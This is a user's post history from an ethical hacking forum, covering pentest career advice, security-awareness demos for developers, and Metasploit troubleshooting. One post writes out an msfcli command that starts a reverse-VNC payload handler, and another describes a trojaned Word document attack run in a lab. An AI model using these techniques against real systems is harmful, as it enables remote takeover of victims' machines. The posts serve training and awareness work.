|
EH-Net
|
|
February 10, 2012, 06:10:14 AM
|
 Show Posts
|
|
Pages: [1]
|
|
1
|
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Penetration Testing in the Real World
|
on: May 04, 2010, 02:18:23 PM
|
|
I showed this video to my developers. I used it to interest them in the actual threats posed by "minor holes." It was an attempt to help them understand how a bad guy leverages various holes to gain control of the entire network.
I also showed a sanitized screenshot of sqlmap dumping a HR DB through a simple website. This was an effort to show them the danger of reusing accounts repeatedly.
I think that the combination worked well. I immediately received email questions and comments.
Anyone else try this?
|
|
|
|
|
3
|
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Pen Test Freelancing?!
|
on: July 02, 2009, 02:19:30 PM
|
|
For me it was a combination of networking and training. I was networking, then my boss offered to pay for GPEN. I jumped on that....
After I had that for a few moths, a local company asked me to freelance with them as a side job doing pentesting. This has led to other stuff as well.
So, keep learning and get an IT operations job. Meanwhile network and the opportunities will sneak up and surprise you. Just jumping into the field after a year of schooling will probably be difficult to impossible. Building a resume and professional contacts will get you further in the long run.
|
|
|
|
|
4
|
Columns / Gates / Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!
|
on: February 26, 2009, 11:14:16 AM
|
|
Did you try uninstalling and reinstalling? When the MS08_067 exploit arrived, the update function would not pull everything properly. Or it wasn't registering things correctly. This happened to several friends. The fastest fix I found was to uninstall and reinstall the app.
And sorry, didn't mean to sound mean about the Window's thing. I just gave up the windows version the other day. I tried to make it work until I wanted to practice backrounding a session and routing through it. It just doesn't work properly in Windows. That's all. I have found the WIndows interface to be buggy.
|
|
|
|
|
6
|
Columns / Gates / Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!
|
on: February 17, 2009, 12:44:35 PM
|
OK. Solved my issues. Well some of them anyway....  My setup was this: BT3 VM with bridged networking. The trojaned .doc file was executed on the host Office suite. That failed. But, if I operated the exploit from a foreign system, it worked fine. In fact it worked so well, I demoed it in a security presentation. Scared some users (as well it should). Very cool. Anyone know where I can read up on these less well documented exploit techniques? This isn't in the default manual. Thanks. |
|
|
|
|
8
|
Columns / Gates / Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!
|
on: February 11, 2009, 03:24:47 PM
|
|
Well, my VM has an IP of 192.168.1.1. So I added LHOST=192.168.1.1 to the exploit.
Then when running ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.1 DisableCourtesyShell=True E
It doesn't give me a "bind failed" error, it just binds to 0.0.0.0.
This happens in a BT3 VM and on a BT3 laptop install. Would I look for the error/problem in BT3 or in Metasploit 3.2?
|
|
|
|
|
9
|
Columns / Gates / Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!
|
on: February 11, 2009, 02:47:02 PM
|
Thanks. I was testing this for a presentation but Symantec actually catches it. So, am trying the vbscript attack. Sadly, there is a quirk with either Metasploit or BT3. Not sure which yet. When I run the /msfcli multi/handler PAYLOAD=<payload> LHOST=<IP> etc..., it runs the exploit and binds to IP=0.0.0.0 which is less than helpful. Heh, I guess there was no reason to assume this would be that easy.  |
|
|
|
|
Loading...
|
Forum 
OSCP - Offensive Security Certified Professional : OSCP Review
